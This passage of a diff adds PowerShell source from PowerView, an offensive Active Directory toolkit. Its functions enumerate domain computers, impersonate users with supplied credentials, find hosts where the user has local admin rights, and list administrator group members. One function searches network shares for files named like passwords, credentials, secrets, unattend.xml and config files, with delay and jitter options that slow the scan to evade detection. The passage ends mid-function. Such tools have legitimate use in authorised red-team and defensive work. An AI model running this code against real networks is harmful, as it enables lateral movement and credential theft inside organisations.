($CheckShareAccess) { + # check if the user has access to this path + try { + $Null = [IO.Directory]::GetFiles($Path) + $Share + } + catch { + Write-Verbose "Error accessing share path $Path : $_" + } + } + else { + $Share + } + } + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken + } + } + else { + Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'CheckShareAccess' = $CheckShareAccess + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-InterestingDomainShareFile { +<# +.SYNOPSIS + +Searches for files matching specific criteria on readable shares +in the domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. It will then use Find-InterestingFile on each +readhable share, searching for files marching specific criteria. If -Credential +is passed, then Invoke-UserImpersonation is used to impersonate the specified +user before enumeration, reverting after with Invoke-RevertToSelf. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER Include + +Only return files/folders that match the specified array of strings, +i.e. @(*.doc*, *.xls*, *.ppt*) + +.PARAMETER SharePath + +Specifies one or more specific share paths to search, in the form \\COMPUTER\Share + +.PARAMETER ExcludedShares + +Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$. + +.PARAMETER LastAccessTime + +Only return files with a LastAccessTime greater than this date value. + +.PARAMETER LastWriteTime + +Only return files with a LastWriteTime greater than this date value. + +.PARAMETER CreationTime + +Only return files with a CreationTime greater than this date value. + +.PARAMETER OfficeDocs + +Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) + +.PARAMETER FreshEXEs + +Switch. Find .EXEs accessed within the last 7 days. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-InterestingDomainShareFile + +Finds 'interesting' files on the current domain. + +.EXAMPLE + +Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local') + +Finds 'interesting' files on readable shares on the specified systems. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches interesting files in the testlab.local domain using the specified alternate credentials. + +.OUTPUTS + +PowerView.FoundFile +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FoundFile')] + [CmdletBinding(DefaultParameterSetName = 'FileSpecification')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [Alias('SearchTerms', 'Terms')] + [String[]] + $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), + + [ValidateNotNullOrEmpty()] + [ValidatePattern('\\\\')] + [Alias('Share')] + [String[]] + $SharePath, + + [String[]] + $ExcludedShares = @('C$', 'Admin$', 'Print$', 'IPC$'), + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastAccessTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastWriteTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $CreationTime, + + [Parameter(ParameterSetName = 'OfficeDocs')] + [Switch] + $OfficeDocs, + + [Parameter(ParameterSetName = 'FreshEXEs')] + [Switch] + $FreshEXEs, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-InterestingDomainShareFile] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-InterestingDomainShareFile] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-InterestingDomainShareFile] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + + $SearchShares = @() + if ($TargetComputer.StartsWith('\\')) { + # if a share is passed as the server + $SearchShares += $TargetComputer + } + else { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # get the shares for this host and display what we find + $Shares = Get-NetShare -ComputerName $TargetComputer + ForEach ($Share in $Shares) { + $ShareName = $Share.Name + $Path = '\\'+$TargetComputer+'\'+$ShareName + # make sure we get a real share name back + if (($ShareName) -and ($ShareName.Trim() -ne '')) { + # skip this share if it's in the exclude list + if ($ExcludedShares -NotContains $ShareName) { + # check if the user has access to this path + try { + $Null = [IO.Directory]::GetFiles($Path) + $SearchShares += $Path + } + catch { + Write-Verbose "[!] No access to $Path" + } + } + } + } + } + } + + ForEach ($Share in $SearchShares) { + Write-Verbose "Searching share: $Share" + $SearchArgs = @{ + 'Path' = $Share + 'Include' = $Include + } + if ($OfficeDocs) { + $SearchArgs['OfficeDocs'] = $OfficeDocs + } + if ($FreshEXEs) { + $SearchArgs['FreshEXEs'] = $FreshEXEs + } + if ($LastAccessTime) { + $SearchArgs['LastAccessTime'] = $LastAccessTime + } + if ($LastWriteTime) { + $SearchArgs['LastWriteTime'] = $LastWriteTime + } + if ($CreationTime) { + $SearchArgs['CreationTime'] = $CreationTime + } + if ($CheckWriteAccess) { + $SearchArgs['CheckWriteAccess'] = $CheckWriteAccess + } + Find-InterestingFile @SearchArgs + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-InterestingDomainShareFile] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-InterestingDomainShareFile] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-InterestingDomainShareFile] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $Include, $ExcludedShares, $OfficeDocs, $ExcludeHidden, $FreshEXEs, $CheckWriteAccess, $LogonToken + } + } + else { + Write-Verbose "[Find-InterestingDomainShareFile] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'Include' = $Include + 'ExcludedShares' = $ExcludedShares + 'OfficeDocs' = $OfficeDocs + 'ExcludeHidden' = $ExcludeHidden + 'FreshEXEs' = $FreshEXEs + 'CheckWriteAccess' = $CheckWriteAccess + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Find-LocalAdminAccess { +<# +.SYNOPSIS + +Finds machines on the local domain where the current user has local administrator access. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and for each computer it checks if the current user +has local administrator access using Test-AdminAccess. If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +Idea adapted from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER CheckShareAccess + +Switch. Only display found shares that the local user has access to. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-LocalAdminAccess + +Finds machines in the current domain the current user has admin access to. + +.EXAMPLE + +Find-LocalAdminAccess -Domain dev.testlab.local + +Finds machines in the dev.testlab.local domain the current user has admin access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-LocalAdminAccess -Domain testlab.local -Credential $Cred + +Finds machines in the testlab.local domain that the user with the specified -Credential +has admin access to. + +.OUTPUTS + +String + +Computer dnshostnames the current user has administrative access to. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Switch] + $CheckShareAccess, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-LocalAdminAccess] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $TokenHandle) + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + # check if the current user has local admin access to this server + $Access = Test-AdminAccess -ComputerName $TargetComputer + if ($Access.IsAdmin) { + $TargetComputer + } + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)" + Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter" + $Counter = 0 + $RandNo = New-Object System.Random + + ForEach ($TargetComputer in $TargetComputers) { + $Counter = $Counter + 1 + + # sleep for our semi-randomized interval + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) + + Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))" + Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken + } + } + else { + Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads" + + # if we're using threading, kick off the script block with New-ThreadedFunction + $ScriptParams = @{ + 'TokenHandle' = $LogonToken + } + + # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params + New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads + } + } +} + + +function Find-DomainLocalGroupMember { +<# +.SYNOPSIS + +Enumerates the members of specified local group (default administrators) +for all the targeted machines on the current (or specified) domain. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction + +.DESCRIPTION + +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the members of the specified local +group (default of Administrators) for each machine using Get-NetLocalGroupMember. +By default, the API method is used, but this can be modified with '-Method winnt' +to use the WinNT service provider. + +.PARAMETER ComputerName + +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +.PARAMETER ComputerDomain + +Specifies the domain to query for computers, defaults to the current domain. + +.PARAMETER ComputerLDAPFilter + +Specifies an LDAP query string that is used to search for computer objects. + +.PARAMETER ComputerSearchBase + +Specifies the LDAP source to search through for computers, +e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries. + +.PARAMETER ComputerOperatingSystem + +Search computers with a specific operating system, wildcards accepted. + +.PARAMETER ComputerServicePack + +Search computers with a specific service pack, wildcards accepted. + +.PARAMETER ComputerSiteName + +Search computers in the specific AD Site name, wildcards accepted. + +.PARAMETER GroupName + +The local group name to query for users. If not given, it defaults to "Administrators". + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain and target systems. + +.PARAMETER Delay + +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +.PARAMETER Jitter + +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +.PARAMETER Threads + +The number of threads to use for user searching, defaults to 20. + +.EXAMPLE + +Find-DomainLocalGroupMember + +Enumerates the local group memberships for all reachable machines in the current domain. + +.EXAMPLE + +Find-DomainLocalGroupMember -Domain dev.testlab.local + +Enumerates the local group memberships for all reachable machines the dev.testlab.local domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred + +Enumerates the local group memberships for all reachable machines the dev.testlab.local +domain using the alternate credentials. + +.OUTPUTS + +PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DNSHostName')] + [String[]] + $ComputerName, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerDomain, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerLDAPFilter, + + [ValidateNotNullOrEmpty()] + [String] + $ComputerSearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('OperatingSystem')] + [String] + $ComputerOperatingSystem, + + [ValidateNotNullOrEmpty()] + [Alias('ServicePack')] + [String] + $ComputerServicePack, + + [ValidateNotNullOrEmpty()] + [Alias('SiteName')] + [String] + $ComputerSiteName, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $GroupName = 'Administrators', + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateRange(1, 10000)] + [Int] + $Delay = 0, + + [ValidateRange(0.0, 1.0)] + [Double] + $Jitter = .3, + + [Int] + [ValidateRange(1, 100)] + $Threads = 20 + ) + + BEGIN { + $ComputerSearcherArguments = @{ + 'Properties' = 'dnshostname' + } + if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain } + if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter } + if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase } + if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained } + if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem } + if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack } + if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName } + if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['ComputerName']) { + $TargetComputers = $ComputerName + } + else { + Write-Verbose '[Find-DomainLocalGroupMember] Querying computers in the domain' + $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname + } + Write-Verbose "[Find-DomainLocalGroupMember] TargetComputers length: $($TargetComputers.Length)" + if ($TargetComputers.Length -eq 0) { + throw '[Find-DomainLocalGroupMember] No hosts found to enumerate' + } + + # the host enumeration block we're using to enumerate all servers + $HostEnumBlock = { + Param($ComputerName, $GroupName, $Method, $TokenHandle) + + # Add check if user defaults to/selects "Administrators" + if ($GroupName -eq "Administrators") { + $AdminSecurityIdentifier = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::BuiltinAdministratorsSid,$null) + $GroupName = ($AdminSecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value -split "\\")[-1] + } + + if ($TokenHandle) { + # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation + $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet + } + + ForEach ($TargetComputer in $ComputerName) { + $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer + if ($Up) { + $NetLocalGroupMemberArguments = @{ + 'ComputerName' = $TargetComputer + 'Method' = $Method + 'GroupName' = $GroupName + } + Get-NetLocalGroupMember @NetLocalGroupMemberArguments + } + } + + if ($TokenHandle) { + Invoke-RevertToSelf + } + } + + $LogonToken = $Null + if ($PSBoundParameters['Credential']) { + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + else { + $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet + } + } + } + + PROCESS { + # only ignore threading if -Delay is passed + if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) { + + Write-Verbose "[Find-DomainLocalGroupMember] 